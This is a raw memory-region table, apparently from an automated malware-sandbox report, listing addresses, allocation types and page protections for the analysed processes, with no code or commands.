1D36CD90000
|
trusted library allocation
|
page read and write
|
||
|
7DE7000
|
heap
|
page read and write
|
||
|
6FB0000
|
trusted library allocation
|
page read and write
|
||
|
21A3E000
|
stack
|
page read and write
|
||
|
64E1000
|
heap
|
page read and write
|
||
|
25A7023C000
|
heap
|
page read and write
|
||
|
56F000
|
stack
|
page read and write
|
||
|
25A7023B000
|
heap
|
page read and write
|
||
|
25A6FF30000
|
heap
|
page read and write
|
||
|
7FF8485C6000
|
trusted library allocation
|
page execute and read and write
|
||
|
2970000
|
trusted library allocation
|
page read and write
|
||
|
7E1D000
|
heap
|
page read and write
|
||
|
7FF8486A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D36B48F000
|
heap
|
page read and write
|
||
|
7FF848691000
|
trusted library allocation
|
page read and write
|
||
|
25A71EE9000
|
heap
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
215B0000
|
direct allocation
|
page read and write
|
||
|
2A18000
|
heap
|
page read and write
|
||
|
4E9000
|
heap
|
page read and write
|
||
|
651000
|
heap
|
page read and write
|
||
|
25A71EF2000
|
heap
|
page read and write
|
||
|
25A71FD0000
|
heap
|
page read and write
|
||
|
1D36D69D000
|
heap
|
page read and write
|
||
|
25A6FF20000
|
heap
|
page read and write
|
||
|
25A7008D000
|
heap
|
page read and write
|
||
|
7FF848800000
|
trusted library allocation
|
page read and write
|
||
|
64CA000
|
heap
|
page read and write
|
||
|
7FF848596000
|
trusted library allocation
|
page read and write
|
||
|
7DDF000
|
heap
|
page read and write
|
||
|
1D3004BB000
|
trusted library allocation
|
page read and write
|
||
|
6FE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848710000
|
trusted library allocation
|
page read and write
|
||
|
25A7004C000
|
heap
|
page read and write
|
||
|
6360000
|
heap
|
page readonly
|
||
|
1D3004FD000
|
trusted library allocation
|
page read and write
|
||
|
1D36CD70000
|
trusted library allocation
|
page read and write
|
||
|
1D301DD7000
|
trusted library allocation
|
page read and write
|
||
|
6730000
|
direct allocation
|
page read and write
|
||
|
6BE8000
|
heap
|
page read and write
|
||
|
6FD0000
|
trusted library allocation
|
page read and write
|
||
|
25A71ED2000
|
heap
|
page read and write
|
||
|
25A700AA000
|
heap
|
page read and write
|
||
|
1D301642000
|
trusted library allocation
|
page read and write
|
||
|
25A700AE000
|
heap
|
page read and write
|
||
|
2B4B000
|
heap
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
8080000
|
direct allocation
|
page read and write
|
||
|
7CEB000
|
stack
|
page read and write
|
||
|
1D310001000
|
trusted library allocation
|
page read and write
|
||
|
297A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2ADC000
|
stack
|
page read and write
|
||
|
25A71FFF000
|
heap
|
page read and write
|
||
|
64E1000
|
heap
|
page read and write
|
||
|
7CF0000
|
heap
|
page read and write
|
||
|
1D36B4E9000
|
heap
|
page read and write
|
||
|
6440000
|
direct allocation
|
page read and write
|
||
|
25A71B80000
|
heap
|
page read and write
|
||
|
6710000
|
direct allocation
|
page read and write
|
||
|
1D300BDC000
|
trusted library allocation
|
page read and write
|
||
|
1D36D4E7000
|
heap
|
page read and write
|
||
|
4E5000
|
heap
|
page read and write
|
||
|
64CA000
|
heap
|
page read and write
|
||
|
25A6FFEF000
|
heap
|
page read and write
|
||
|
644000
|
heap
|
page read and write
|
||
|
1D36B560000
|
heap
|
page read and write
|
||
|
6F50000
|
trusted library allocation
|
page read and write
|
||
|
29F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7AAF000
|
stack
|
page read and write
|
||
|
8050000
|
trusted library allocation
|
page read and write
|
||
|
67B0000
|
direct allocation
|
page read and write
|
||
|
1D36CD50000
|
trusted library allocation
|
page read and write
|
||
|
7FA0000
|
trusted library allocation
|
page read and write
|
||
|
4BDC87E000
|
stack
|
page read and write
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
7FF848590000
|
trusted library allocation
|
page read and write
|
||
|
7DA8000
|
heap
|
page read and write
|
||
|
25A71F03000
|
heap
|
page read and write
|
||
|
3C70000
|
remote allocation
|
page execute and read and write
|
||
|
7D90000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A71F39000
|
heap
|
page read and write
|
||
|
8A0000
|
heap
|
page read and write
|
||
|
6A8F000
|
stack
|
page read and write
|
||
|
1D36CDD0000
|
heap
|
page read and write
|
||
|
1D36B585000
|
heap
|
page read and write
|
||
|
1D36CDF0000
|
trusted library allocation
|
page read and write
|
||
|
5EF000
|
stack
|
page read and write
|
||
|
4BDD7CB000
|
stack
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
6AC0000
|
heap
|
page read and write
|
||
|
92EE000
|
direct allocation
|
page execute and read and write
|
||
|
1D36B580000
|
heap
|
page read and write
|
||
|
1D36D6F7000
|
heap
|
page read and write
|
||
|
4BDC67C000
|
stack
|
page read and write
|
||
|
1D36B485000
|
heap
|
page read and write
|
||
|
1D36D48C000
|
heap
|
page read and write
|
||
|
6CD2000
|
heap
|
page read and write
|
||
|
2985000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
25A7200F000
|
heap
|
page read and write
|
||
|
1D36B440000
|
heap
|
page read and write
|
||
|
67C6000
|
heap
|
page read and write
|
||
|
64CF000
|
heap
|
page read and write
|
||
|
7DC0000
|
heap
|
page read and write
|
||
|
7FF8486D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848840000
|
trusted library allocation
|
page read and write
|
||
|
1D36D666000
|
heap
|
page read and write
|
||
|
1D36D3B0000
|
heap
|
page execute and read and write
|
||
|
25A6FFD9000
|
heap
|
page read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
649C000
|
heap
|
page read and write
|
||
|
64CA000
|
heap
|
page read and write
|
||
|
6AB0000
|
heap
|
page read and write
|
||
|
1D300BEA000
|
trusted library allocation
|
page read and write
|
||
|
6E5E000
|
stack
|
page read and write
|
||
|
80B0000
|
direct allocation
|
page read and write
|
||
|
4BDC47E000
|
stack
|
page read and write
|
||
|
7FF8484E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
6760000
|
direct allocation
|
page read and write
|
||
|
25A7202D000
|
heap
|
page read and write
|
||
|
21ABD000
|
stack
|
page read and write
|
||
|
6DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A6FFB0000
|
heap
|
page read and write
|
||
|
5189000
|
trusted library allocation
|
page read and write
|
||
|
6C30000
|
heap
|
page read and write
|
||
|
7FF8484E2000
|
trusted library allocation
|
page read and write
|
||
|
1D301F2E000
|
trusted library allocation
|
page read and write
|
||
|
12C000
|
stack
|
page read and write
|
||
|
1D36B46C000
|
heap
|
page read and write
|
||
|
7FF848810000
|
trusted library allocation
|
page read and write
|
||
|
25A71FEB000
|
heap
|
page read and write
|
||
|
25A71ED0000
|
heap
|
page read and write
|
||
|
4BDC979000
|
stack
|
page read and write
|
||
|
6E10000
|
heap
|
page execute and read and write
|
||
|
21C4E000
|
stack
|
page read and write
|
||
|
1D310021000
|
trusted library allocation
|
page read and write
|
||
|
64B0000
|
heap
|
page execute and read and write
|
||
|
1D301DA0000
|
trusted library allocation
|
page read and write
|
||
|
79D0000
|
trusted library allocation
|
page read and write
|
||
|
1D300A79000
|
trusted library allocation
|
page read and write
|
||
|
6430000
|
direct allocation
|
page read and write
|
||
|
1D301D82000
|
trusted library allocation
|
page read and write
|
||
|
25A7023C000
|
heap
|
page read and write
|
||
|
25A71FDF000
|
heap
|
page read and write
|
||
|
21F30000
|
heap
|
page read and write
|
||
|
6EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848860000
|
trusted library allocation
|
page read and write
|
||
|
25A71EE4000
|
heap
|
page read and write
|
||
|
6A4E000
|
stack
|
page read and write
|
||
|
6FF0000
|
trusted library allocation
|
page read and write
|
||
|
25A70024000
|
heap
|
page read and write
|
||
|
7FF848770000
|
trusted library allocation
|
page read and write
|
||
|
21CEE000
|
stack
|
page read and write
|
||
|
25A7008D000
|
heap
|
page read and write
|
||
|
215C0000
|
direct allocation
|
page read and write
|
||
|
7FF848760000
|
trusted library allocation
|
page read and write
|
||
|
7FF848850000
|
trusted library allocation
|
page read and write
|
||
|
21DD0000
|
heap
|
page read and write
|
||
|
1D36D4E0000
|
heap
|
page read and write
|
||
|
25A71FFF000
|
heap
|
page read and write
|
||
|
64E1000
|
heap
|
page read and write
|
||
|
1D36B44E000
|
heap
|
page read and write
|
||
|
41C4000
|
trusted library allocation
|
page read and write
|
||
|
25A700AB000
|
heap
|
page read and write
|
||
|
4161000
|
trusted library allocation
|
page read and write
|
||
|
7FF848780000
|
trusted library allocation
|
page read and write
|
||
|
69A000
|
heap
|
page read and write
|
||
|
6750000
|
direct allocation
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
1D36D65E000
|
heap
|
page read and write
|
||
|
25A71EE6000
|
heap
|
page read and write
|
||
|
6400000
|
direct allocation
|
page read and write
|
||
|
25A71FFF000
|
heap
|
page read and write
|
||
|
1D36CD80000
|
heap
|
page readonly
|
||
|
25A71EF5000
|
heap
|
page read and write
|
||
|
65FE000
|
stack
|
page read and write
|
||
|
25A6FFED000
|
heap
|
page read and write
|
||
|
1D36B4D0000
|
heap
|
page read and write
|
||
|
1D36D6E7000
|
heap
|
page read and write
|
||
|
4BDD74B000
|
stack
|
page read and write
|
||
|
6350000
|
heap
|
page read and write
|
||
|
6E9E000
|
stack
|
page read and write
|
||
|
1D36D6C0000
|
heap
|
page read and write
|
||
|
1D300632000
|
trusted library allocation
|
page read and write
|
||
|
6410000
|
heap
|
page read and write
|
||
|
295D000
|
trusted library allocation
|
page execute and read and write
|
||
|
47DE000
|
remote allocation
|
page execute and read and write
|
||
|
4BDC6FE000
|
stack
|
page read and write
|
||
|
61D000
|
heap
|
page read and write
|
||
|
7FB0000
|
trusted library allocation
|
page read and write
|
||
|
67C0000
|
heap
|
page read and write
|
||
|
1D300001000
|
trusted library allocation
|
page read and write
|
||
|
64CC000
|
heap
|
page read and write
|
||
|
1D300088000
|
trusted library allocation
|
page read and write
|
||
|
6DD0000
|
trusted library allocation
|
page read and write
|
||
|
25A7009A000
|
heap
|
page read and write
|
||
|
4BDD64E000
|
stack
|
page read and write
|
||
|
1D36D427000
|
heap
|
page execute and read and write
|
||
|
1D36D6CB000
|
heap
|
page read and write
|
||
|
4BDC4FE000
|
stack
|
page read and write
|
||
|
1D36D420000
|
heap
|
page execute and read and write
|
||
|
25A71EE4000
|
heap
|
page read and write
|
||
|
1D301DD5000
|
trusted library allocation
|
page read and write
|
||
|
6DC0000
|
trusted library allocation
|
page read and write
|
||
|
6BC0000
|
heap
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
4BDC77E000
|
stack
|
page read and write
|
||
|
1D36D6E4000
|
heap
|
page read and write
|
||
|
25A70092000
|
heap
|
page read and write
|
||
|
1D300228000
|
trusted library allocation
|
page read and write
|
||
|
703B000
|
stack
|
page read and write
|
||
|
25A72030000
|
heap
|
page read and write
|
||
|
25A71F03000
|
heap
|
page read and write
|
||
|
25A71FE3000
|
heap
|
page read and write
|
||
|
1D36D48A000
|
heap
|
page read and write
|
||
|
64CF000
|
heap
|
page read and write
|
||
|
7FF8486C2000
|
trusted library allocation
|
page read and write
|
||
|
25A6FFDF000
|
heap
|
page read and write
|
||
|
1D36CEA2000
|
heap
|
page read and write
|
||
|
6C25000
|
heap
|
page read and write
|
||
|
79C7000
|
stack
|
page read and write
|
||
|
64CF000
|
heap
|
page read and write
|
||
|
21B7E000
|
stack
|
page read and write
|
||
|
25A70095000
|
heap
|
page read and write
|
||
|
25A7008D000
|
heap
|
page read and write
|
||
|
6EB0000
|
trusted library allocation
|
page read and write
|
||
|
25A6FFE0000
|
heap
|
page read and write
|
||
|
6720000
|
direct allocation
|
page read and write
|
||
|
6F80000
|
trusted library allocation
|
page read and write
|
||
|
B4EB3FF000
|
stack
|
page read and write
|
||
|
2A9F000
|
stack
|
page read and write
|
||
|
645A000
|
heap
|
page read and write
|
||
|
25A6FFB9000
|
heap
|
page read and write
|
||
|
6DC8000
|
trusted library allocation
|
page read and write
|
||
|
7FF84859C000
|
trusted library allocation
|
page execute and read and write
|
||
|
8040000
|
trusted library allocation
|
page read and write
|
||
|
7DF7000
|
heap
|
page read and write
|
||
|
663F000
|
stack
|
page read and write
|
||
|
4BDCAFE000
|
stack
|
page read and write
|
||
|
1D3102F6000
|
trusted library allocation
|
page read and write
|
||
|
21A7E000
|
stack
|
page read and write
|
||
|
650C000
|
heap
|
page read and write
|
||
|
25A71ED8000
|
heap
|
page read and write
|
||
|
25A700A5000
|
heap
|
page read and write
|
||
|
1D301459000
|
trusted library allocation
|
page read and write
|
||
|
B4EB9FB000
|
stack
|
page read and write
|
||
|
1D300479000
|
trusted library allocation
|
page read and write
|
||
|
21960000
|
heap
|
page read and write
|
||
|
B4EB0FE000
|
stack
|
page read and write
|
||
|
5161000
|
trusted library allocation
|
page read and write
|
||
|
6C33000
|
heap
|
page read and write
|
||
|
2953000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A71FD1000
|
heap
|
page read and write
|
||
|
6420000
|
direct allocation
|
page read and write
|
||
|
7FF848700000
|
trusted library allocation
|
page read and write
|
||
|
B4EB7FE000
|
stack
|
page read and write
|
||
|
1D301E17000
|
trusted library allocation
|
page read and write
|
||
|
4BDC8F7000
|
stack
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
21CB0000
|
remote allocation
|
page read and write
|
||
|
64B5000
|
heap
|
page execute and read and write
|
||
|
25A700A7000
|
heap
|
page read and write
|
||
|
21600000
|
direct allocation
|
page read and write
|
||
|
64B8000
|
heap
|
page read and write
|
||
|
21CB0000
|
remote allocation
|
page read and write
|
||
|
51C5000
|
trusted library allocation
|
page read and write
|
||
|
64E1000
|
heap
|
page read and write
|
||
|
64C3000
|
heap
|
page read and write
|
||
|
2982000
|
trusted library allocation
|
page read and write
|
||
|
25A7023E000
|
heap
|
page read and write
|
||
|
1D36CE90000
|
heap
|
page execute and read and write
|
||
|
7FF848870000
|
trusted library allocation
|
page read and write
|
||
|
1D36CE20000
|
trusted library allocation
|
page read and write
|
||
|
1D36D6F2000
|
heap
|
page read and write
|
||
|
7FF8484E0000
|
trusted library allocation
|
page read and write
|
||
|
7DF4AEEB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3DDE000
|
remote allocation
|
page execute and read and write
|
||
|
52E000
|
stack
|
page read and write
|
||
|
1D3004F9000
|
trusted library allocation
|
page read and write
|
||
|
7FF8487F0000
|
trusted library allocation
|
page read and write
|
||
|
25A71FD7000
|
heap
|
page read and write
|
||
|
516B000
|
trusted library allocation
|
page read and write
|
||
|
1D36B495000
|
heap
|
page read and write
|
||
|
25A71FD3000
|
heap
|
page read and write
|
||
|
1D301E13000
|
trusted library allocation
|
page read and write
|
||
|
1D36B487000
|
heap
|
page read and write
|
||
|
21D7B000
|
stack
|
page read and write
|
||
|
7DA0000
|
heap
|
page read and write
|
||
|
7FF848790000
|
trusted library allocation
|
page read and write
|
||
|
4BDC878000
|
stack
|
page read and write
|
||
|
1D310010000
|
trusted library allocation
|
page read and write
|
||
|
1D300491000
|
trusted library allocation
|
page read and write
|
||
|
B4EB6FD000
|
stack
|
page read and write
|
||
|
215F0000
|
direct allocation
|
page read and write
|
||
|
7AB0000
|
heap
|
page read and write
|
||
|
25A71ED1000
|
heap
|
page read and write
|
||
|
25A72040000
|
heap
|
page read and write
|
||
|
79F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6370000
|
heap
|
page read and write
|
||
|
6450000
|
heap
|
page read and write
|
||
|
7FF848720000
|
trusted library allocation
|
page read and write
|
||
|
4BDCB7E000
|
stack
|
page read and write
|
||
|
7FF8486C5000
|
trusted library allocation
|
page read and write
|
||
|
279C000
|
stack
|
page read and write
|
||
|
B4EAD8A000
|
stack
|
page read and write
|
||
|
7C60000
|
trusted library allocation
|
page read and write
|
||
|
6FC0000
|
trusted library allocation
|
page read and write
|
||
|
21CB0000
|
remote allocation
|
page read and write
|
||
|
25A70235000
|
heap
|
page read and write
|
||
|
9CEE000
|
direct allocation
|
page execute and read and write
|
||
|
6B8000
|
heap
|
page read and write
|
||
|
1D300482000
|
trusted library allocation
|
page read and write
|
||
|
8C0000
|
trusted library section
|
page read and write
|
||
|
25A700A6000
|
heap
|
page read and write
|
||
|
25A6FF50000
|
heap
|
page read and write
|
||
|
29A0000
|
trusted library allocation
|
page read and write
|
||
|
64CC000
|
heap
|
page read and write
|
||
|
63EE000
|
unkown
|
page read and write
|
||
|
25A70230000
|
heap
|
page read and write
|
||
|
7FF8487A0000
|
trusted library allocation
|
page read and write
|
||
|
2980000
|
trusted library allocation
|
page read and write
|
||
|
29C8000
|
trusted library allocation
|
page read and write
|
||
|
6F60000
|
trusted library allocation
|
page read and write
|
||
|
7FF8486B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6DE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5171000
|
trusted library allocation
|
page read and write
|
||
|
1D300484000
|
trusted library allocation
|
page read and write
|
||
|
25A72036000
|
heap
|
page read and write
|
||
|
215D0000
|
direct allocation
|
page read and write
|
||
|
27DB000
|
stack
|
page read and write
|
||
|
25A71EE6000
|
heap
|
page read and write
|
||
|
7FF84869A000
|
trusted library allocation
|
page read and write
|
||
|
7FF8486C7000
|
trusted library allocation
|
page read and write
|
||
|
1D36B320000
|
heap
|
page read and write
|
||
|
65BE000
|
stack
|
page read and write
|
||
|
25A700A8000
|
heap
|
page read and write
|
||
|
6A5000
|
heap
|
page read and write
|
||
|
6F4D000
|
stack
|
page read and write
|
||
|
7FF8487B0000
|
trusted library allocation
|
page read and write
|
||
|
1D36D430000
|
heap
|
page read and write
|
||
|
2954000
|
trusted library allocation
|
page read and write
|
||
|
219BE000
|
stack
|
page read and write
|
||
|
7FF8485A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8487D0000
|
trusted library allocation
|
page read and write
|
||
|
8D0000
|
trusted library allocation
|
page read and write
|
||
|
1D3006CC000
|
trusted library allocation
|
page read and write
|
||
|
7E9E000
|
stack
|
page read and write
|
||
|
2950000
|
trusted library allocation
|
page read and write
|
||
|
6780000
|
direct allocation
|
page read and write
|
||
|
79E0000
|
trusted library allocation
|
page read and write
|
||
|
7F840000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A71EFE000
|
heap
|
page read and write
|
||
|
29B0000
|
heap
|
page readonly
|
||
|
6F90000
|
trusted library allocation
|
page read and write
|
||
|
2960000
|
trusted library allocation
|
page read and write
|
||
|
1D300BC3000
|
trusted library allocation
|
page read and write
|
||
|
6415000
|
heap
|
page read and write
|
||
|
8090000
|
direct allocation
|
page read and write
|
||
|
2A5E000
|
stack
|
page read and write
|
||
|
25A7200B000
|
heap
|
page read and write
|
||
|
21AFC000
|
stack
|
page read and write
|
||
|
168000
|
stack
|
page read and write
|
||
|
1D301D97000
|
trusted library allocation
|
page read and write
|
||
|
1D30201D000
|
trusted library allocation
|
page read and write
|
||
|
80E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A71EDB000
|
heap
|
page read and write
|
||
|
1D36D6E1000
|
heap
|
page read and write
|
||
|
1D36D684000
|
heap
|
page read and write
|
||
|
21DBB000
|
stack
|
page read and write
|
||
|
7FF848730000
|
trusted library allocation
|
page read and write
|
||
|
25A70017000
|
heap
|
page read and write
|
||
|
64CC000
|
heap
|
page read and write
|
||
|
7C55000
|
trusted library allocation
|
page read and write
|
||
|
4BDCBFE000
|
stack
|
page read and write
|
||
|
6F70000
|
trusted library allocation
|
page read and write
|
||
|
1D301D7E000
|
trusted library allocation
|
page read and write
|
||
|
25A700A0000
|
heap
|
page read and write
|
||
|
4E0000
|
heap
|
page read and write
|
||
|
7FF8484ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E1F000
|
unkown
|
page read and write
|
||
|
6DB000
|
heap
|
page read and write
|
||
|
25A71ED1000
|
heap
|
page read and write
|
||
|
63F0000
|
direct allocation
|
page read and write
|
||
|
7FF848680000
|
trusted library allocation
|
page read and write
|
||
|
25A71F03000
|
heap
|
page read and write
|
||
|
25A71FDC000
|
heap
|
page read and write
|
||
|
4BDC9FB000
|
stack
|
page read and write
|
||
|
7A00000
|
heap
|
page read and write
|
||
|
64E1000
|
heap
|
page read and write
|
||
|
25A7008D000
|
heap
|
page read and write
|
||
|
1D301DA8000
|
trusted library allocation
|
page read and write
|
||
|
4BDC1CF000
|
stack
|
page read and write
|
||
|
1D300495000
|
trusted library allocation
|
page read and write
|
||
|
7FF8486F0000
|
trusted library allocation
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
215E0000
|
direct allocation
|
page read and write
|
||
|
5AE000
|
stack
|
page read and write
|
||
|
6F0E000
|
stack
|
page read and write
|
||
|
25A71F38000
|
heap
|
page read and write
|
||
|
2A00000
|
trusted library allocation
|
page read and write
|
||
|
25A6FFED000
|
heap
|
page read and write
|
||
|
1D36B400000
|
heap
|
page read and write
|
||
|
1D301DBC000
|
trusted library allocation
|
page read and write
|
||
|
1D36CDE5000
|
heap
|
page read and write
|
There are 484 hidden memdumps, click here to show them.